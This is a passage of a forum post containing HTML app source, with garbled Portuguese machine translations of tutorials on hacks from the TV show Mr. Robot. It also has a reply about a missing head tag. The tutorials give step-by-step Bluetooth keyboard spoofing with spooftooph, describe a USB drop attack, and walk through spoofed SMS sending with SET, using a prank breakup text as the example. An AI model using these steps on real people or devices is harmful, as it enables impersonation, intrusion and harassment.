nele, eles vão precisar de decifrá-lo com a senha conhecida somente por mim.</p>
<p>No caso de Elliot <em>Sr. Robot, ele agora tomou esses arquivos de áudio e queimou-los para um CD, mas isso não é necessário. </em>Presumivelmente, ele está fazendo isso para dar mais um passo para garantir esses
arquivos no caso que o seu computador está sempre confiscados e investigado. É improvável que ouvir os seus CDs de música qualquer investigação.</p>
<h2>Passo 6: Decode</h2>
<p>Eventualmente, Elliot, ou a pessoa que a informação se destina a ser, terá de decodificar a informação escondida. Basta clicar sobre o arquivo de áudio e, em seguida, no ícone "Extrair arquivos secretos". Quando o
fizer, ele irá pedir-lhe uma senha. Digite a senha que você criou na Etapa # 3, clique em "OK", eo arquivo oculto aparecerá na janela do lado direito.
<br>
<br>Agora, você pode ler a mensagem escondida, secreta usando o software adequado que a mensagem foi criada. Neste caso, seria Microsoft Word ou qualquer outro software capaz de abrir um arquivo .doc.
<br>
<br>Manter a voltar, meus aprendizes de hackers, à medida que continuamos a explorar os hacks de Mr. Robot e quase todos os outros corte concebível noplaneta!</p>
<p> </p>
</div>
</div>
</div>
</div>
</div>
<div class="upage hidden back" id="trinta_sete">
<div class="upage-outer">
<div class="uib-header header-bg container-group inner-element uib_w_386" data-uib="layout/header" data-ver="0">
<h2>Os Hacks de Mr. Robot</h2>
<div class="widget-container wrapping-col single-centered"></div>
<div class="widget-container content-area horiz-area wrapping-col left">
<button class="btn widget uib_w_387 d-margins btn-info" data-uib="twitter%20bootstrap/button" data-ver="1" id="btng_300"><i class="glyphicon glyphicon-chevron-left button-icon-left" data-position="left"></i>
</button>
</div>
<div class="widget-container content-area horiz-area wrapping-col right"></div>
</div>
<div class="upage-content ac0 content-area vertical-col left" id="page_6_82">
<div class="tarea widget uib_w_388 d-margins tte" data-uib="media/text" data-ver="0" name="uib_w_388">
<div class="widget-container left-receptacle"></div>
<div class="widget-container right-receptacle"></div>
<div class="text-container">
<p>Neste episódio, Elliot está sendo chantageado pelo traficante cruel e implacável, Vera, para cortar-lo fora da cadeia. Ele está segurando novo interesse amoroso de Elliot, Shayla, refém e deu Elliot até meia-noite para
hackear o sistema informático do cárcere, a fim de libertá-lo.
<br>
<br>
</p>
<p>Elliot tenta explicar a Vera que tal corte não pode ser feito em questão de horas, mas dias ou semanas para encontrar uma vulnerabilidade de segurança que ele pode explorar. Vera, sendo o assassino cruel e fraco de espírito
que ele é, não vai ceder a dar Elliot mais tempo. Como resultado, Elliot tem que tentar algumas técnicas menos-que-ideal para tentar hackear Vera fora da cadeia para salvar o adorável Shayla (que se lembrar, Shayla
é também o seu fornecedor morfina).</p>
<p>Malicioso Flash Drive</p>
<p>Em sua primeira tentativa de cortar a cadeia, Elliot tem Darlene, seu amigo e rival de f / sociedade, drives flash "acidentalmente" soltar infectada fora da cadeia. A estratégia aqui é que, se alguém dentro da rede da
prisão pega um e insere-lo em seu sistema de computador, o que irá, em seguida, injetar malware e dar Elliot uma conexão do lado de fora.
<br>
<br>
</p>
<p>Como esperado, um oficial de correções dimwitted faz uma pick up e insere-lo em seu computador. Elliot é capaz de obter uma conexão SSH para ele, mas antes que ele é capaz de fazer qualquer coisa, o software AV detecta
e desliga Elliot. Elliot então repreende Darlene como um "script-kiddie" para a utilização de um malware conhecido de Rapid9 (uma referência ao Metasploit desenvolvedor 's, Rapid7) ao invés de desenvolver
um novo exploit, e Darlene se defende dizendo: "Eu só tinha uma hora. "(Ela poderia ter re-codificado com Veil-Evasion e que poderia ter ido além do software AV sem ser detectado.)</p>
<p>Alguns questionaram se essa abordagem poderia funcionar. Antes da desativação do recurso de execução automática automática em sistemas operacionais modernos, você poderia ter um arquivo EXE no flash drive que seria executado
automaticamente. Em um sistema operacional moderno, a execução automática estiver desativada por padrão.</p>
<p>Poderíamos supor que esta máquina tinha o recurso de execução automática habilitada ou, mais provavelmente, Darlene tinha instalado o malware em um flash drive que foi reprogramado para emular um teclado USB. Quando a
unidade flash está instalada no sistema, o sistema operacional, em seguida, reconhece a unidade flash USB como um teclado, dando-lhe acesso com os direitos do usuário conectado e, em seguida, injeta seu código malicioso
no sistema operacional. Assim, esta abordagem pode ter funcionado tinha Darlene re-codificado o malware com Veil-Evasion.</p>
<p>Corte WPA2</p>
<p>Enquanto Elliot está de visita Vera na prisão, ele traz seu telefone com ele, em que ele instalou um aplicativo de scanner Wi-Fi. Com esse scanner, ele pode ver todos os APs sem fio e vê que todos eles são protegidos com
WPA2. Embora ele sabe que pode rachar WPA2, ele reconhece que o período de tempo curto, ele está trabalhando com é inadequada para força bruta WPA2.</p>
</div>
</div>
<div class="widget uib_w_389" data-uib="media/img" data-ver="0">
<figure class="figure-align">
<img src="http://img.wonderhowto.com/img/62/74/63575143958182/0/hacks-mr-robot-hack-bluetooth.w654.jpg">
<figcaption data-position="bottom"></figcaption>
</figure>
</div>
<div class="tarea widget uib_w_390 d-margins tte" data-uib="media/text" data-ver="0" name="uib_w_390">
<div class="widget-container left-receptacle"></div>
<div class="widget-container right-receptacle"></div>
<div class="text-container">
<p>No processo de digitalização de hotspots wireless e tecnologias de criptografia com seu telefone, Elliot vê uma conexão Bluetooth quando a unidade carro ups de um oficial de correções perto dele.
<br>
</p>
<p>Que estimula Elliot em uma nova estratégia, ou seja, cortar o Bluetooth e entrar no sistema de computador da prisão através do carro policial dedicado conexão de celular para a prisão!</p>
<p>Hacking um teclado Bluetooth</p>
<p>A estratégia da Elliot aqui é para falsificar do carro policial conexão Bluetooth com o seu teclado. Se ele pode fazer o laptop acreditar que o seu teclado é, na verdade, o teclado do policial, ele pode controlar laptop
do policial e fique por dentro da rede da prisão. Uma vez dentro da rede, ele pode fazer o upload de malwares para assumir o controle dos sistemas de comando digital da prisão.</p>
<p>Passo 1: Ativar Bluetooth</p>
<p>Antes Elliot pode fazer qualquer coisa, ele precisa ativar o Bluetooth em seu sistema de hacking Linux iniciando o serviço de bluetooth:</p>
<p><strong>kali > service bluetooth start</strong>
</p>
</div>
</div>
<div class="widget uib_w_391" data-uib="media/img" data-ver="0">
<figure class="figure-align">
<img src="http://img.wonderhowto.com/img/56/91/63575414058366/0/hacks-mr-robot-hack-bluetooth.w654.jpg">
<figcaption data-position="bottom"></figcaption>
</figure>
</div>
<div class="tarea widget uib_w_392 d-margins tte" data-uib="media/text" data-ver="0" name="uib_w_392">
<div class="widget-container left-receptacle"></div>
<div class="widget-container right-receptacle"></div>
<div class="text-container">
<p>Em seguida, ele precisa para ativar o dispositivo Bluetooth:</p>
<p><strong>kali> hciconfig hci0 up</strong>
</p>
<p>Em seguida, ele verifica para ver se ele está realmente trabalhando, bem como as suas propriedades, digitando:</p>
<p><strong>kali> hciconfig hci0</strong>
</p>
</div>
</div>
<div class="widget uib_w_393" data-uib="media/img" data-ver="0">
<figure class="figure-align">
<img src="http://img.wonderhowto.com/img/54/30/63575414082787/0/hacks-mr-robot-hack-bluetooth.w654.jpg">
<figcaption data-position="bottom"></figcaption>
</figure>
</div>
<div class="tarea widget uib_w_394 d-margins tte" data-uib="media/text" data-ver="0" name="uib_w_394">
<div class="widget-container left-receptacle"></div>
<div class="widget-container right-receptacle"></div>
<div class="text-container">
<p>Por favor, note o "BD Address" na segunda linha-este é o endereço MAC do dispositivo Bluetooth.</p>
<p>Etapa 2: Verificar se há dispositivos Bluetooth</p>
<p>A primeira coisa Elliot faz neste truque é fazer a varredura para conexões Bluetooth. Se você olhar atentamente para a tela de Elliot, você pode ver que ele está usando <em>hcitool, um built-in Bluetooth ferramenta de configuração em Kali Linux. </em>Embora
isso funciona, I tiveram melhor sucesso com <em>btscanner, um built-in Bluetooth scanner com uma GUI rudimentar.</em>Para usá-lo, tipo simples:</p>
<p><strong>kali> btscanner</strong>
</p>
<p>Em seguida, selecione "i" para iniciar uma varredura de inquérito. Você pode ver os resultados abaixo.</p>
</div>
</div>
<div class="widget uib_w_395" data-uib="media/img" data-ver="0">
<figure class="figure-align">
<img src="http://img.wonderhowto.com/img/20/93/63575072772173/0/hacks-mr-robot-hack-bluetooth.w654.jpg">
<figcaption data-position="bottom"></figcaption>
</figure>
</div>
<div class="tarea widget uib_w_396 d-margins tte" data-uib="media/text" data-ver="0" name="uib_w_396">
<div class="widget-container left-receptacle"></div>
<div class="widget-container right-receptacle"></div>
<div class="text-container">
<p>Usando btscanner, podemos obter uma lista de todos os dispositivos Bluetooth ao alcance. Este aqui tem um endereço MAC e um nome de "Tyler" spoof -para este dispositivo, devemos falsificar o endereço MAC eo nome do dispositivo.</p>
<p>Isto é como Elliot obtém o endereço MAC eo nome do dispositivo Bluetooth no carro do policial. Lembre-se de que o Bluetooth é um protocolo de baixa potência com um intervalo de apenas cerca de 10 metros (embora com uma
antena direcional, as distâncias até 100 metros foram alcançados).</p>
<h2>Passo 3: falsificar o endereço MAC do Teclado</h2>
<p>Agora que Elliot tem o nome eo endereço MAC do teclado do policial, ele vai precisar para falsificar isso por clonagem teclado do policial com esta informação. Kali Linux tem uma ferramenta desenhada para falsificar dispositivos
Bluetooth chamados spooftooph. Podemos usá-lo para falsificar o teclado com um comando semelhante a este:</p>
<p><strong>kali> spooftooph -i hci0 -a A0: 02: DC: 11: 4F: 85 -n Car537</strong>
</p>
<p><strong>-i</strong> designa o dispositivo, neste caso hci0</p>
<p><strong>-a</strong> designa o endereço MAC queremos falsificar
<br>
<strong>-n</strong> designa o nome do dispositivo que queremos falsificar, neste caso "Car537"</p>
<p>Se fizermos isso direito, o nosso dispositivo Bluetooth vai falsificar o endereço MAC eo nome do dispositivo de computador com Bluetooth do policial.</p>
</div>
</div>
<div class="widget uib_w_397" data-uib="media/img" data-ver="0">
<figure class="figure-align">
<img src="http://img.wonderhowto.com/img/86/13/63575414130693/0/hacks-mr-robot-hack-bluetooth.w654.jpg">
<figcaption data-position="bottom"></figcaption>
</figure>
</div>
<div class="tarea widget uib_w_398 d-margins tte" data-uib="media/text" data-ver="0" name="uib_w_398">
<div class="widget-container left-receptacle"></div>
<div class="widget-container right-receptacle"></div>
<div class="text-container">
<p>Para verificar para ver se fomos bem sucedidos, podemos usar <em>hciconfig</em>seguido do "nome" interruptor do aparelho e que irá listar o nome do dispositivo. Lembre-se, este é o nosso dispositivo Bluetooth que
estamos tentando emular com dispositivo Bluetooth do carro da polícia. Se formos bem sucedidos, ele terá o mesmo endereço MAC eo nome do dispositivo Bluetooth do policial.</p>
<p><strong>kali> nome hciconfig hci0</strong>
</p>
</div>
</div>
<div class="widget uib_w_399" data-uib="media/img" data-ver="0">
<figure class="figure-align">
<img src="http://img.wonderhowto.com/img/24/91/63575414160209/0/hacks-mr-robot-hack-bluetooth.w654.jpg">
<figcaption data-position="bottom"></figcaption>
</figure>
</div>
<div class="tarea widget uib_w_400 d-margins tte" data-uib="media/text" data-ver="0" name="uib_w_400">
<div class="widget-container left-receptacle"></div>
<div class="widget-container right-receptacle"></div>
<div class="text-container">
<p>Agora, temos um dispositivo Bluetooth que é clone perfeito do carro policial teclado Bluetooth!</p>
<p>Passo 4: Device Link Bluetooth ao portátil da Cop</p>
<p>Agora, aqui é onde a realidade eo <em>Sr. Robot</em> enredo divergem. Pirataria de Mr. Robot é muito realista, mas mesmo neste show, o diretor leva algum licença literária. Isso permitiu-criativas obras
não deve ser limitada pela realidade.</p>
<p>Para Eliot agora conectar ao laptop do carro da polícia, ele precisaria a tecla link (esta é uma chave para identificar o dispositivo Bluetooth previamente emparelhado), que foi trocada entre o teclado eo adaptador Bluetooth
no laptop.</p>
<p>Ele podia adivinhar-lo (improvável) ou quebrá-la, mas não vai ser tão rápido como apareceu no show. Outra possibilidade é que quando o sistema for reiniciado ou o teclado foi desligado, Elliot pôde se conectar ao laptop,
pois é um clone do teclado do policial. Em ambos os casos, seria necessário mais tempo do que Elliot tinha neste episódio de cortar teclado Bluetooth do policial.</p>
<p>Passo 5: Corte o Prison</p>
<p>Na etapa final, Elliot usa o computador hackeado do policial para fazer o upload de malwares via FTP que lhe dará o controle das portas das celas da prisão. Poucas pessoas percebem que as prisões e outros sistemas industriais,
muitas vezes referida como SCADA, são muito hackable.</p>
<p>O Stuxnet corte de instalação de enriquecimento de urânio do Irã era muito semelhante a esta. Estes sistema industrial tem PLCs que são, basicamente, controladores digitais. Presumivelmente, esta prisão
teve PLCs que controlam as portas das celas da prisão (uma suposição muito razoável) e malware de Elliot infectados eles e deu-lhe o controle, permitindo-lhe abrir todas as células, liberando Vera e todos os outros prisioneiros.</p>
</div>
</div>
</div>
</div>
</div>
<div class="upage hidden back" id="te_oito">
<div class="upage-outer">
<div class="uib-header header-bg container-group inner-element uib_w_401" data-uib="layout/header" data-ver="0">
<h2>Os Hack De Mr.Robot</h2>
<div class="widget-container wrapping-col single-centered"></div>
<div class="widget-container content-area horiz-area wrapping-col left">
<button class="btn widget uib_w_402 d-margins btn-info" data-uib="twitter%20bootstrap/button" data-ver="1" id="bakf_tou"><i class="glyphicon glyphicon-chevron-left button-icon-left" data-position="left"></i>
</button>
</div>
<div class="widget-container content-area horiz-area wrapping-col right"></div>
</div>
<div class="upage-content ac0 content-area vertical-col left" id="page_42_20">
<div class="tarea widget uib_w_404 d-margins tte" data-uib="media/text" data-ver="0" name="uib_w_404">
<div class="widget-container left-receptacle"></div>
<div class="widget-container right-receptacle"></div>
<div class="text-container">
<p>A mensagem de texto Spoofed no Episódio 5</p>
<p>No episódio 5, quando Elliot é capaz de engenheiro social o seu caminho para o estado da arte do Aço Mountain, "impenetrável" instalação de armazenamento, um gerente fica desconfiado e começa a escoltá-lo para
fora do prédio antes que ele possa implantar o Raspberry Pi (que fizemos na última guia).</p>
<p>Ele pretende colocar o RP dentro da rede para manipular o sistema HVAC para elevar a temperatura na instalação de armazenamento e destruir as fitas que contêm os registros de 70% da dívida do consumidor do mundo, incluindo
empréstimos estudantis. No exato momento em que ela está prestes a escoltá-lo até o elevador e para fora da instalação, ela recebe uma mensagem de texto do marido que é urgente e distrai aqui. A mensagem de texto
na verdade não vir de seu marido, mas sim de um dos companheiros f / sociedade de Elliot.
<br>Neste tutorial, vou mostrar-lhe como companheiros de Elliot em f / sociedade foram capazes de enviar o gerente Aço Mountain, uma mensagem de texto urgente falsificado que parecia vir de seu marido, indicando que ele estava
no hospital e tinha um grave problema de saúde.</p>
</div>
</div>
<div class="widget uib_w_405" data-uib="media/img" data-ver="0">
<figure class="figure-align">
<img src="http://img.wonderhowto.com/img/64/47/63573781524406/0/hacks-mr-robot-send-spoofed-sms-text-message.w654.jpg">
<figcaption data-position="bottom"></figcaption>
</figure>
</div>
<div class="tarea widget uib_w_406 d-margins tte" data-uib="media/text" data-ver="0" name="uib_w_406">
<div class="widget-container left-receptacle"></div>
<div class="widget-container right-receptacle"></div>
<div class="text-container">
<p>No show, camaradas f / sociedade de Elliot usar Kali para enviar o SMS falsificado, mas esse recurso foi descontinuado em versões recentes do Kali. Felizmente, porém, ele ainda está em BackTrack, assim,
para este tutorial, estaremos revertendo para a nossa instalação BackTrack fiel (mais um exemplo de que o mais novo nem sempre é a melhor).</p>
<p>Passo 1: Fire Up BackTrack & Start Engenharia Social Toolkit (SET)</p>
<p>Vamos começar por disparar Backtrack 5 e, em seguida, navegar para Aplicações -> Ferramentas Exploração -> Ferramentas de engenharia social -> Social Engineering Toolkit (SET), em seguida, selecione "set" como eu fiz
na imagem abaixo.</p>
</div>
</div>
<div class="widget uib_w_407" data-uib="media/img" data-ver="0">
<figure class="figure-align">
<img src="http://img.wonderhowto.com/img/97/59/63573779469640/0/hacks-mr-robot-send-spoofed-sms-text-message.w654.jpg">
<figcaption data-position="bottom"></figcaption>
</figure>
</div>
<div class="tarea widget uib_w_408 d-margins tte" data-uib="media/text" data-ver="0" name="uib_w_408">
<div class="widget-container left-receptacle"></div>
<div class="widget-container right-receptacle"></div>
<div class="text-container">
<p>Isso vai começar a tela de abertura do SET como visto abaixo. SET é capaz de inúmeros ataques de engenharia social. Nós já usou set de lança phish em BackTrack, mas o que queremos neste momento é "SMS
spoofing vetor de ataque." Para iniciar este ataque, Select # 7.</p>
</div>
</div>
<div class="widget uib_w_409" data-uib="media/img" data-ver="0">
<figure class="figure-align">
<img src="http://img.wonderhowto.com/img/42/01/63573779485547/0/hacks-mr-robot-send-spoofed-sms-text-message.w654.jpg">
<figcaption data-position="bottom"></figcaption>
</figure>
</div>
<div class="tarea widget uib_w_410 d-margins tte" data-uib="media/text" data-ver="0" name="uib_w_410">
<div class="widget-container left-receptacle"></div>
<div class="widget-container right-receptacle"></div>
<div class="text-container">
<p>Na tela seguinte nós perguntado se nós queremos "Executar um SMS Spoofing Attack" ou "Criar um modelo de engenharia social." Selecione # 1.Depois de ter feito essa seleção, você será perguntado se você quer falsificar
um único número ou um ataque em massa. Selecione # 1 para um único número.</p>
</div>
</div>
<div class="widget uib_w_411" data-uib="media/img" data-ver="0">
<figure class="figure-align">
<img src="http://img.wonderhowto.com/img/60/10/63573779498203/0/hacks-mr-robot-send-spoofed-sms-text-message.w654.jpg">
<figcaption data-position="bottom"></figcaption>
</figure>
</div>
<div class="tarea widget uib_w_412 d-margins tte" data-uib="media/text" data-ver="0" name="uib_w_412">
<div class="widget-container left-receptacle"></div>
<div class="widget-container right-receptacle"></div>
<div class="text-container">
<p>Passo 2: Configurar uma mensagem de texto Spoofed</p>
<p>Aqui, eu quero enviar uma mensagem de texto falsificado de Mary (namorada do meu melhor amigo) para John (o meu melhor amigo), onde ela rompe com ele. Isso deve sacudir ele um pouco e me dar algumas risadas enquanto ele
está loucamente apaixonado por ela.</p>
<p>Primeiro, insira o seu número de telefone onde ele pede para você "Enviar sms para." Em seguida, selecione # 2 para criar um One-Time Use SMS. Por fim, digite seu número de telefone. Certifique-se de ambos os
números são precedidas pelo "+".</p>
</div>
</div>
<div class="widget uib_w_413" data-uib="media/img" data-ver="0">
<figure class="figure-align">
<img src="http://img.wonderhowto.com/img/64/23/63573779509906/0/hacks-mr-robot-send-spoofed-sms-text-message.w654.jpg">
<figcaption data-position="bottom"></figcaption>
</figure>
</div>
<div class="tarea widget uib_w_414 d-margins tte" data-uib="media/text" data-ver="0" name="uib_w_414">
<div class="widget-container left-receptacle"></div>
<div class="widget-container right-receptacle"></div>
<div class="text-container">
<p>Passo 3: Craft a mensagem de texto</p>
<p>Em nossa etapa final, precisamos digitar a mensagem que deseja enviar ao John de sua namorada, Mary.</p>
<p>"Eu sinto muito John. Eu conheci outro homem e ele é o amor da minha vida. Espero que possamos continuar amigos"
<br>
<br>
</p>
<p>Quando você terminar de digitar, saia batendo <em>Controle</em> + C.</p>
<p>Passo 4: Envie a mensagem!</p>
<p>Isso o levará para a tela final. Nesta tela, teremos de seleccionar o intermediário para a mensagem SMS falsificado. Você tem quatro opções aqui. O primeiro é livre, e como dizem, é de buggy (quando eu corri
dela, caiu SET). Então, há duas opções para-pay e, finalmente, o emulador Android.</p>
</div>
</div>
<div class="widget uib_w_415" data-uib="media/img" data-ver="0">
<figure class="figure-align">
<img src="http://img.wonderhowto.com/img/84/35/63573779531359/0/hacks-mr-robot-send-spoofed-sms-text-message.w654.jpg">
<figcaption data-position="bottom"></figcaption>
</figure>
</div>
<div class="tarea widget uib_w_416 d-margins tte" data-uib="media/text" data-ver="0" name="uib_w_416">
<div class="widget-container left-receptacle"></div>
<div class="widget-container right-receptacle"></div>
<div class="text-container">
<p>Eu escolhi a terceira opção, SMSGANG. Eles cobram 3 euros para 5 mensagens, ou cerca de US $ 0,65 em dólares norte-americanos por mensagem. Quando você paga (eles aceitam cartões de crédito e PayPal) que você enviar
um código PIN. Depois de selecionar # 3, ele irá pedir para um "código PIN". Digite o SMSGANG lhe enviou e, em seguida, a mensagem de texto é enviada!</p>
</div>
</div>
</div>
</div>
</div>
</body>
</html>
- Tags:
- HTML5
- Intel® XDK
Link Copied
- Mark as New
- Bookmark
- Subscribe
- Mute
- Subscribe to RSS Feed
- Permalink
- Report Inappropriate Content
Dá a impressão que você apagou várias linhas na parte <head> do programa. Tente colocar uma linha com </head> antes do primeiro <div>.
Isso deve retornar parte (deve faltar mais coisas no meior...)

- Subscribe to RSS Feed
- Mark Topic as New
- Mark Topic as Read
- Float this Topic for Current User
- Bookmark
- Subscribe
- Printer Friendly Page